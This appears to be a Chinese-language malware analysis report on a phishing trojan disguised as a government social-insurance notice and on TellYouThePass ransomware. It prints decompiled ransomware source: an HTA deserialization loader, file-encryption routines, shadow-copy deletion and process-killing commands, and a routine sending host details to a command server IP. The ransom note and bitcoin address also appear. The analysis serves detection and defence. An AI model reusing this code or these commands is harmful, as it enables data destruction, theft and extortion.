文件名称
人社部发〔2023〕161号文:公司与个人缴纳比例最新调整.exe
文件大小
143.85 KB
首次出现时间/捕获分析时间
2024/03/23 || 2024/03/23
威胁类型
钓鱼木马
远控IP
45.195.204.190
文件格式
EXEx86
HASH
SHA256:40a4aa644d857b855c1045aada794832461272a15fa1138fb1993c6b94ae3eb7MD5:b105455e5b390fc6dabb4338a6423a8aSHA1:cb5554bf2f29c8bde7a82a05efaa1a0814dea067
文件类型(Magic)
PE32 executable (GUI) Intel 80386, for MS Windows
1.2 执行流程
1.3 远控地址
2.钓鱼木马行为分析
2.1 核心函数
此木马伪装为mfc程序,在初始化函数中找到字符串,定位到核心函数:
412cd0为核心代码,其他函数都是伪装的。
第一个字符串可能是软件的版本信息,第二行申请了一大块内存,用于存储读到的shellcode。
2.2 初始化函数
414ad0为初始化函数,创建了多线程用的event,执行了wsastartup.dll模块地址和函数地址都是动态获取的。
2.3 连接函数
414bb0为连接函数,连接到服务器并输出一些中文调试信息。
连接服务器,并创建下载线程。
2.4 下载函数
414cb0为下载线程。
下载shellcode后,分配内存,写入一些疑似密码的字符串。
创建执行线程.执行完毕后,将执行完成标志置1。
执行后,调用414e00,发送感染成功信息。
死循环等待执行标志置1。
3.加密器基础信息
3.1 文件基础信息
文件名
78403c39.exe
大小
5632(5.50 KiB)
操作系统
Windows(95)
架构
I386
模式
32 位
类型
控制台
字节序
LE
MD5
d6a722fc1d3e4998de93f6112dded913
SHA256
16482e6c3ad97f048851f87b67446a64340eeb8e
2.2 勒索信
send 0.08btc to my address:bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l. contact email:[email protected] ,if you can't contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me .your id: ATNPERSONID
2.2 勒索hta
在被感染的主机上找到了可疑文件,hta文件中嵌入了VBScript代码用于实现恶意功能
<script language="VBScript">
Sub DebugPrint(s)
End
Sub
Sub SetVersion
Dim shell
Set
shell = CreateObject(
"WScript.Shell"
)
shell.Environment(
"Process"
).Item(
"COMPLUS_Version"
) =
"v4.0.30319"
End
Sub
Function
Base64ToStream(b)
Dim enc,
length
, ba, transform, ms
Set
enc = CreateObject(
"System.Text.ASCIIEncoding"
)
length
= enc.GetByteCount_2(b)
Set
transform = CreateObject(
"System.Security.Cryptography.FromBase64Transform"
)
Set
ms = CreateObject(
"System.IO.MemoryStream"
)
ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b),
0
,
length
),
0
, ((
length
/
4
) *
3
)
ms.Position =
0
Set
Base64ToStream = ms
End
Function
Sub Run
Dim s, entry_class
s =
"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"
s = s &
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"
s = s &
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"
...省略约
20000
行
s = s &
"AAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5"
s = s &
"IExvYWQoQnl0ZVtdKQgAAAAKCwAA"
entry_class =
"EfsPotato.Mshta"
Dim fmt, al, d, o
Set
fmt = CreateObject(
"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter"
)
Set
al = CreateObject(
"System.Collections.ArrayList"
)
al.Add
Empty
Set
d = fmt.Deserialize_2(Base64ToStream(s))
Set
o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
End
Sub
SetVersion
On
Error
Resume
Next
Run
If
Err.Number <>
0
Then
DebugPrint Err.Description
Err.Clear
End
If
self.close
</script>
此代码的功能主要为,将上述的base64字符串反序列化之后执行相关的恶意功能,此程序会释放4个相关文件。
4.恶意文件分析
4.1 威胁分析
病毒家族
TellYouThePass
首次出现时间/捕获分析时间
2024/03/20 || 2024/03/20
威胁类型
勒索软件,加密病毒
勒索软件地区
国外
加密文件扩展名
.locked
勒索信文件名
READ_ME6.html
有无免费解密器?
无
联系邮箱
[email protected]
检测名称
Avast (Win32:RansomX-gen [Ransom]), AhnLab-V3 (Ransomware/Win.Ransom.C5011664), AliCloud (RansomWare), Avast (Win32:RansomX-gen [Ransom]), Avira (no cloud) (HEUR/AGEN.1319014), BitDefenderTheta (Gen:NN.ZexaF.36802.muW@a83MUGci),ClamAV(Win.Ransomware.Rapid-9371249-0),Cybereason(Malicious.0fe686),Cynet(Malicious (score: 100)),DrWeb(Trojan.Encoder.37869),eScan(Trojan.GenericKD.70329037), Fortinet (W32/Filecoder.MALL!tr.ransom),Google(Detected)
感染症状
无法打开存储在计算机上的文件,以前功能的文件现在具有不同的扩展名(.locked)。桌面上会显示一条勒索要求消息(READ_ME6.html)。网络犯罪分子要求通过邮箱联系后支付比特币后提供数据恢复工具
感染方式
钓鱼
受灾影响
大部分文件将被加密
4.2 加密器
此文件的执行参数如下
78403c39.exe 78403c39.bin z5nYkKl64ZNkhDpQT02vW2I6qudygrPl z5nYkKl64ZNkhDpQ
5.逆向分析
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;
// Token: 0x02000002 RID: 2
internal class Program
{
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
private static void Main(string[] args)
{
Console.WriteLine("
Start
Update
");
if (args.Length == 0)
{
Console.WriteLine("
helloworld
");
return;
}
if (args.Length != 3)
{
Console.WriteLine("
helloworld1
");
return;
}
string s = args[1];
string s2 = args[2];
byte[] bytes = Encoding.UTF8.GetBytes(s);
byte[] bytes2 = Encoding.UTF8.GetBytes(s2);
byte[] array = Program.File2Byte(args[0]);
if (array != null)
{
Assembly.Load(Program.Decrypt(array, bytes, bytes2)).CreateInstance("
U
").Equals("");
return;
}
Console.WriteLine("
helloworld2
");
}
// Token: 0x06000002 RID: 2 RVA: 0x000020E4 File Offset: 0x000002E4
public static byte[] Decrypt(byte[] cipherText, byte[] key, byte[] iv)
{
byte[] result;
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.Key = key;
rijndaelManaged.IV = iv;
ICryptoTransform transform = rijndaelManaged.CreateDecryptor(rijndaelManaged.Key, rijndaelManaged.IV);
using (MemoryStream memoryStream = new MemoryStream())
{
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write))
{
cryptoStream.Write(cipherText, 0, cipherText.Length);
}
result = memoryStream.ToArray();
}
}
return result;
}
// Token: 0x06000003 RID: 3 RVA: 0x00002188 File Offset: 0x00000388
public static byte[] File2Byte(string filePath)
{
byte[] result;
try
{
using (FileStream fileStream = new FileStream(filePath, FileMode.Open, FileAccess.Read))
{
byte[] array = new byte[fileStream.Length];
fileStream.Read(array, 0, (int)fileStream.Length);
result = array;
}
}
catch (Exception)
{
result = null;
}
return result;
}
}
程序将会读取第一个参数作为文件路径,以及第二个和第三个参数作为密钥和初始向量,然后调用 Decrypt
方法对指定的文件进行解密操作,并尝试加载解密后的内容为一个程序集,并创建其名为 "U" 的实例。
Decrypt
方法是一个静态方法,用于对给定的密文进行解密。它使用了对称加密算法 Rijndael,并通过密钥和初始向量进行解密操作。
File2Byte
方法也是一个静态方法,用于将指定文件的内容读取为字节数组并返回。
那么推测恶意行为的代码存在于Assembly.Load加载的解密的内容中,捕获此部分内容输出到文件output.bin
中。
5.1 核心程序
文件名
output.bin
大小
28672(28.00 KiB)
操作系统
Windows(95)
架构
I386
模式
32 位
类型
DLL
字节序
LE
MD5
5b5415d4895b7da6f4d8c2a8efa1d06a
SHA256
2881194b7e0939d47165c894c891737d8c189ee8fb4720e814a4bcdd804d00d1
5.2 函数RUN
恶意功能从此处开始运行,调用了U.SleepRand();
进行了随机休眠,可能是为了逃避沙盒检测,随机生成了一对公私钥,将私钥用程序自带的公钥进行加密得到ID
。
private static string personPubKey = "BgIAAACkAABSU0ExAAQAAAEAAQABo5INMgvZRHU+odxc8HTZUnsValb+zVbnhjhUK0Smo6MnGNYvaQY6vN9j5viFHTfCgu0NculsfILwXtUVUn8WqEHjm0xfbsKl93uazKHzyuiiepA5ggNHgGbZ5vnpo5MKE3ykwdqYPst8ULxCZNPCdu3kK2PKC2li150Dl8e2zA==";
Dictionary<string, string> key = rsautil.GetKey();
string pubKey = key["PublicKey"];
string strEncryptString = key["PrivateKey"];
string text3 = rsautil.EncrytByPublic(U.personPubKey, strEncryptString);
// U
// Token: 0x06000011 RID: 17 RVA: 0x00002578 File Offset: 0x00000778
public bool Run()
{
U.SleepRand();
int tickCount = Environment.TickCount;
if (!U.IsNotRunning())
{
U.SendHttp("already2 runing1");
return false;
}
U.Destroy();
string text = common.GetWritePath() + "\pubkey9.txt";
string text2 = common.GetWritePath() + "\show9.txt";
string path = common.GetWritePath() + "\hellotest1.txt";
common.GetWritePath() + "\more9.txt";
if (File.Exists(text) || File.Exists(text2) || File.Exists(text + U.fileExtension) || File.Exists(text2 + U.fileExtension))
{
U.SendHttp("already3 runing1");
return false;
}
if (!U.skipJava && File.Exists(path))
{
U.SendHttp("already555 runing1");
return false;
}
Console.WriteLine("generate new");
RSAUtil rsautil = new RSAUtil();
Dictionary<string, string> key = rsautil.GetKey();
string pubKey = key["PublicKey"];
string strEncryptString = key["PrivateKey"];
string text3 = rsautil.EncrytByPublic(U.personPubKey, strEncryptString);
string contents = rsautil.EncrytByPublic(U.personPubKey, DateTime.Now.ToString() + U.GetInfo());
if (File.Exists(text) || File.Exists(text2) || File.Exists(text + U.fileExtension) || File.Exists(text2 + U.fileExtension))
{
U.SendHttp("already4 runing1");
return false;
}
if (!U.skipJava && File.Exists(path))
{
U.SendHttp("already66 runing1");
return false;
}
try
{
File.WriteAllText(text, contents);
File.WriteAllText(text2, text3);
}
catch
{
}
U.SendHttp("start5run");
int encSize = 10485760;
List<string> list = new List<string>();
list.Add(common.GetEnvByName("USERPROFILE"));
list.Add(common.GetEnvByName("PUBLIC"));
list.Add(common.GetEnvByName("HOMEPATH"));
foreach (string item in Environment.GetLogicalDrives())
{
list.Add(item);
}
U.appendDebugMsg("paths:" + string.Join(",", list.ToArray()));
foreach (string text4 in list)
{
U.appendDebugMsg("run dir:" + text4);
U.RunEncProcessDirectory(text4, pubKey, encSize, text3);
}
U.SendHttp("done
--" + U.countFile.ToString());
return true;
}
5.3 函数RunEncProcessDirectory
此处对目录进行迭代搜索:
首先,它尝试获取指定路径下的所有文件,并对每个文件执行以下操作:
检查文件是否允许加密(通过 U.IsAllowExt(text)
方法判断)。
确保文件名中不包含特定的字符串(U.msgFileName
(即READ_ME6.html
)、"pubkey.txt
"、"show.txt
")。
如果文件符合条件,则开始对该文件执行加密操作,调用 U.RunEncProcessFile()
方法。
在加密文件后,检查文件计数是否达到一定值(U.countFile
不为零且小于等于 2000,并且能被 500 整除),如果满足条件,则发送一个 HTTP 消息,通知加密进度。
接着,它尝试获取指定路径下的所有子目录,并对每个子目录执行以下操作:
检查该子目录是否被阻止加密(通过 U.IsBlockDir(text2)
方法判断),如果未被阻止,则递归调用 RunEncProcessDirectory
方法。
// U
// Token: 0x06000016 RID: 22 RVA: 0x0000296C File Offset: 0x00000B6C
public
static
void
RunEncProcessDirectory
(
string
path,
string
pubKey,
int
encSize,
string
showID
)
{
if
(path.Length ==
0
)
{
return
;
}
try
{
foreach
(
string
text
in
Directory.GetFiles(path))
{
if
(U.IsAllowExt(text) && !text.Contains(U.msgFileName) && !text.Contains(
"pubkey.txt"
) && !text.Contains(
"show.txt"
))
{
U.appendDebugMsg(
"start enc file:"
+ text);
U.RunEncProcessFile(text, pubKey, encSize, showID);
if
(U.countFile !=
0
&& U.countFile <=
2000
&& U.countFile %
500
==
0
)
{
U.SendHttp(
"do-"
+ U.countFile.ToString());
}
}
else
{
U.appendDebugMsg(
"skip enc file:"
+ text);
}
}
}
catch
{
}
try
{
foreach
(
string
text2
in
Directory.GetDirectories(path))
{
if
(!U.IsBlockDir(text2))
{
U.RunEncProcessDirectory(text2, pubKey, encSize, showID);
}
}
}
catch
(Exception ex)
{
Console.WriteLine(
"read dir from path {0} error {1}"
, path, ex.Message);
}
U.WriteMsg(path, showID);
}
5.4 函数IsAllowExt
白名单文件后缀
public
static
bool
IsAllowExt
(
string
name
)
{
foreach
(
string
text
in
U.extensionsToEncrypt)
{
if
(name.ToLower().EndsWith(text.ToLower()))
{
return
true
;
}
}
return
false
;
}
private
static
readonly
string
[] extensionsToEncrypt =
new
string
[]
{
"1cd"
,
"3dm"
,
"3ds"
,
"3fr"
,
"3g2"
,
"3gp"
,
"3pr"
,
"602"
,
"7z"
,
"ps1"
,
"7zip"
,
"aac"
,
"ab4"
,
"accdb"
,
"accde"
,
"accdr"
,
"accdt"
,
"ach"
,
"acr"
,
"act"
,
"adb"
,
"adp"
,
"ads"
,
"aes"
,
"agdl"
,
"zip"
,
省略其他正常白名单后缀
};
5.5 函数IsBlockDir
文件夹黑名单,不加密此类文件夹以及其子文件夹
public
static
bool
IsBlockDir
(
string
name
)
{
foreach
(
string
text
in
U.blockDirName)
{
if
(name.ToLower().Contains(text.ToLower()))
{
return
true
;
}
}
return
false
;
}
private
static
readonly
string
[] blockDirName =
new
string
[]
{
"EFI.Boot"
,
"EFI.Microsoft"
,
":.Windows"
,
"All Users"
,
"Boot"
,
"IEidcache"
,
"ProgramData"
,
"desktop.ini"
,
"autorun.inf"
,
"netuser.dat"
,
"ntuser.dat"
,
"bootsect.bak"
,
"iconcache.db"
,
"thumbs.db"
,
"Local Settings"
,
"bootfont.bin"
,
"System Volume Information"
,
"AppData"
,
"Recycle.Bin"
,
":.Recovery"
,
"Windows\System32"
,
"Windows\System"
,
"Windows\SysWOW64"
,
"Windows\security"
,
"WindowsPowerShell"
,
"Windows\assembly"
,
"Windows\Microsoft.NET"
,
"Windows\Fonts"
,
"Windows\IME"
,
"Windows\boot"
,
"Windows\inf"
,
"show"
,
"pubkey"
,
"READ_ME"
,
"README"
};
5.6 函数SendHttp
向107.175.127.195
发送相关信息,此ip归属地为美国得克萨斯州达拉斯
。向服务器发送用户相关信息,包括MachineName
,UserName
,ProcessorCount
,Version
,isadmin
,并伪装为百度的流量Host:``css.baidu.com
。
public
static
string
httpAddr =
"107.175.127.195"
;
public
static
int
httpPort =
80
;
public
static
void
SendHttp
(
string
s
)
{
IPAddress[] hostAddresses = Dns.GetHostAddresses(Dns.GetHostName());
s +=
"--"
;
s = s + Environment.MachineName +
"--"
;
s = s + Environment.UserName +
"--"
;
s = s + Environment.ProcessorCount +
"--"
;
s = s + Environment.Version +
"--"
;
s = s +
new
WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString() +
"--"
;
foreach
(IPAddress ipaddress
in
hostAddresses)
{
s = s + ipaddress.ToString() +
","
;
}
s = Uri.EscapeDataString(s);
string
s2 =
"GET /css/css.css?v="
+ s +
" HTTP/1.1rnHost:css.baidu.comrnrn"
;
try
{
Socket socket =
new
Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
IPEndPoint remoteEP =
new
IPEndPoint(IPAddress.Parse(U.httpAddr), U.httpPort);
socket.Connect(remoteEP);
socket.Send(Encoding.Default.GetBytes(s2));
Thread.Sleep(
1000
);
socket.Close();
}
catch
(Exception ex)
{
Console.WriteLine(
"error socket {0}"
, ex.Message);
}
}
5.7 函数Destroy
通过 U.ExecuteCmd()
方法执行了一系列 net stop
命令,用于停止服务;
通过 U.ExecuteCmd()
方法执行了 vssadmin delete shadows /all
命令,用于删除所有卷影副本;
通过 U.ExecuteCmd()
方法执行了一系列 taskkill
命令,用于强制终止指定名称的进程。
// U
// Token: 0x0600001C RID: 28 RVA: 0x00002DA0 File Offset: 0x00000FA0
public
static
void
Destroy
(
)
{
U.ExecuteCmd(
"net stop SQLTELEMETRY"
);
U.ExecuteCmd(
"net stop ReportServer"
);
U.ExecuteCmd(
"net stop SQLSERVERAGENT"
);
U.ExecuteCmd(
"net stop MSSQLServerOLAPService"
);
U.ExecuteCmd(
"net stop SQLBrowser"
);
U.ExecuteCmd(
"net stop SQLWriter"
);
U.ExecuteCmd(
"net stop mssqlserver"
);
U.ExecuteCmd(
"net stop msmq"
);
U.ExecuteCmd(
"net stop mssql"
);
U.ExecuteCmd(
"net stop mysql"
);
U.ExecuteCmd(
"net stop mongodb"
);
U.ExecuteCmd(
"net stop rabbitmq"
);
U.ExecuteCmd(
"vssadmin delete shadows /all"
);
U.ExecuteCmd(
"taskkill /f /im msftesql.exe"
);
U.ExecuteCmd(
"taskkill /f /im sqlagent.exe"
);
U.ExecuteCmd(
"taskkill /f /im sqlbrowser.exe"
);
U.ExecuteCmd(
"taskkill /f /im sqlservr.exe"
);
U.ExecuteCmd(
"taskkill /f /im sqlwriter.exe"
);
U.ExecuteCmd(
"taskkill /f /im oracle.exe"
);
U.ExecuteCmd(
"taskkill /f /im ocssd.exe"
);
U.ExecuteCmd(
"taskkill /f /im dbsnmp.exe"
);
U.ExecuteCmd(
"taskkill /f /im synctime.exe"
);
U.ExecuteCmd(
"taskkill /f /im mydesktopqos.exe"
);
U.ExecuteCmd(
"taskkill /f /im agntsvc.exeisqlplussvc.exe"
);
U.ExecuteCmd(
"taskkill /f /im xfssvccon.exe"
);
U.ExecuteCmd(
"taskkill /f /im mydesktopservice.exe"
);
U.ExecuteCmd(
"taskkill /f /im ocautoupds.exe"
);
U.ExecuteCmd(
"taskkill /f /im agntsvc.exeagntsvc.exe"
);
U.ExecuteCmd(
"taskkill /f /im agntsvc.exeencsvc.exe"
);
U.ExecuteCmd(
"taskkill /f /im firefoxconfig.exe"
);
U.ExecuteCmd(
"taskkill /f /im tbirdconfig.exe"
);
U.ExecuteCmd(
"taskkill /f /im ocomm.exe"
);
U.ExecuteCmd(
"taskkill /f /im mysqld.exe"
);
U.ExecuteCmd(
"taskkill /f /im mysqld-nt.exe"
);
U.ExecuteCmd(
"taskkill /f /im mysqld-opt.exe"
);
U.ExecuteCmd(
"taskkill /f /im dbeng50.exe"
);
U.ExecuteCmd(
"taskkill /f /im sqbcoreservice.exe"
);
U.ExecuteCmd(
"taskkill /f /im excel.exe"
);
U.ExecuteCmd(
"taskkill /f /im infopath.exe"
);
U.ExecuteCmd(
"taskkill /f /im msaccess.exe"
);
U.ExecuteCmd(
"taskkill /f /im mspub.exe"
);
U.ExecuteCmd(
"taskkill /f /im onenote.exe"
);
U.ExecuteCmd(
"taskkill /f /im outlook.exe"
);
U.ExecuteCmd(
"taskkill /f /im powerpnt.exe"
);
U.ExecuteCmd(
"taskkill /f /im steam.exe"
);
U.ExecuteCmd(
"taskkill /f /im sqlservr.exe"
);
U.ExecuteCmd(
"taskkill /f /im thebat.exe"
);
U.ExecuteCmd(
"taskkill /f /im thebat64.exe"
);
U.ExecuteCmd(
"taskkill /f /im thunderbird.exe"
);
U.ExecuteCmd(
"taskkill /f /im visio.exe"
);
U.ExecuteCmd(
"taskkill /f /im winword.exe"
);
U.ExecuteCmd(
"taskkill /f /im wordpad.exe"
);
U.ExecuteCmd(
"taskkill /f /im tnslsnr.exe"
);
}
5.8 函数WriteMsg
写入勒索信息
host
type
target
pri
helloworldtom.online
MX
mx1.titan.email
10
helloworldtom.online
MX
mx2.titan.email
20
// U
// Token: 0x06000018 RID: 24 RVA: 0x00002ADC File Offset: 0x00000CDC
public
static
void
WriteMsg
(
string
path,
string
showId
)
{
try
{
if
(!File.Exists(path +
"\"
+ U.msgFileName))
{
File.WriteAllText(path +
"\"
+ U.msgFileName, U.readMeMsg.Replace(
"PERSONID"
, showId));
}
}
catch
(Exception ex)
{
Console.WriteLine(
"write readme file error {0}"
, ex.Message);
}
}
private
static
string
btcCount =
"0.08"
;
private
static
string
btcAddr =
"bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l"
;
private
static
string
email =
"[email protected] "
;
private
static
string
readMeMsg =
string
.Concat(
new
string
[]
{
"send "
,
U.btcCount,
"btc to my address:"
,
U.btcAddr,
". contact email:"
,
U.email,
",if you can't contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me .your id: ATNPERSONID"
});
5.9 函数RunEncProcessFile
在 try-catch
块中,首先调用 common.FileEncryptNew()
方法执行文件加密操作,将加密后的文件保存为原文件名加上指定的文件扩展名(U.fileExtension
)。
每次成功加密一个文件后,递增 U.countFile
变量,用于记录加密文件的数量。
调用 U.appendDebugMsg()
方法记录加密成功的消息。
如果在加密过程中发生异常,捕获异常并输出错误消息到控制台,然后调用 U.appendDebugMsg()
方法记录加密失败的消息,包括文件名和异常信息。
private
static
readonly
string
fileExtension =
".locked"
;
// U
// Token: 0x06000015 RID: 21 RVA: 0x000028EC File Offset: 0x00000AEC
public
static
void
RunEncProcessFile
(
string
filename,
string
pubKey,
int
encSize,
string
encPrivateKey
)
{
try
{
common.FileEncryptNew(filename, filename + U.fileExtension, pubKey, encSize);
U.countFile++;
U.appendDebugMsg(
"enc file success"
+ filename);
}
catch
(Exception ex)
{
Console.WriteLine(
"enc from filename {0} error {1}"
, filename, ex.Message);
U.appendDebugMsg(
"enc file fail:"
+ filename +
"reason:"
+ ex.ToString());
}
}
5.10 函数FileEncryptNew
用于执行文件加密操作,其中使用了 RSA 加密算法和 Rijndael 对称加密算法。
public
static
bool
FileEncryptNew
(
string
inputFile,
string
outputFile,
string
pubKey,
int
size
)
{
bool
flag =
true
;
byte
[] rand = common.GetRand(
2
);
byte
[] rand2 = common.GetRand(
1
);
byte
[] array =
new
byte
[
48
];
Buffer.BlockCopy(rand,
0
, array,
0
, rand.Length);
Buffer.BlockCopy(rand2,
0
, array, rand.Length, rand2.Length);
byte
[] array2 =
new
RSAUtil().EncryptByBytes(array, pubKey);
FileStream fileStream =
new
FileStream(outputFile, FileMode.Create);
RijndaelManaged rijndaelManaged =
new
RijndaelManaged();
rijndaelManaged.KeySize =
256
;
rijndaelManaged.BlockSize =
128
;
rijndaelManaged.Padding = PaddingMode.PKCS7;
rijndaelManaged.Key = rand;
rijndaelManaged.IV = rand2;
rijndaelManaged.Mode = CipherMode.CFB;
fileStream.Write(array2,
0
, array2.Length);
CryptoStream cryptoStream =
new
CryptoStream(fileStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write);
FileStream fileStream2 =
new
FileStream(inputFile, FileMode.Open);
byte
[] array3 =
new
byte
[size];
try
{
int
count;
while
((count = fileStream2.Read(array3,
0
, array3.Length)) >
0
)
{
cryptoStream.Write(array3,
0
, count);
}
fileStream2.Close();
}
catch
(Exception ex)
{
flag =
false
;
Console.WriteLine(
"Error: "
+ ex.Message);
U.appendDebugMsg(
"enc file"
+ inputFile +
" fail:"
+ ex.ToString());
}
finally
{
cryptoStream.Close();
fileStream.Close();
}
if
(flag)
{
if
(!common.RemoveFile(inputFile))
{
common.RemoveFile(outputFile);
}
}
else
{
common.RemoveFile(outputFile);
}
return
flag;
}
评论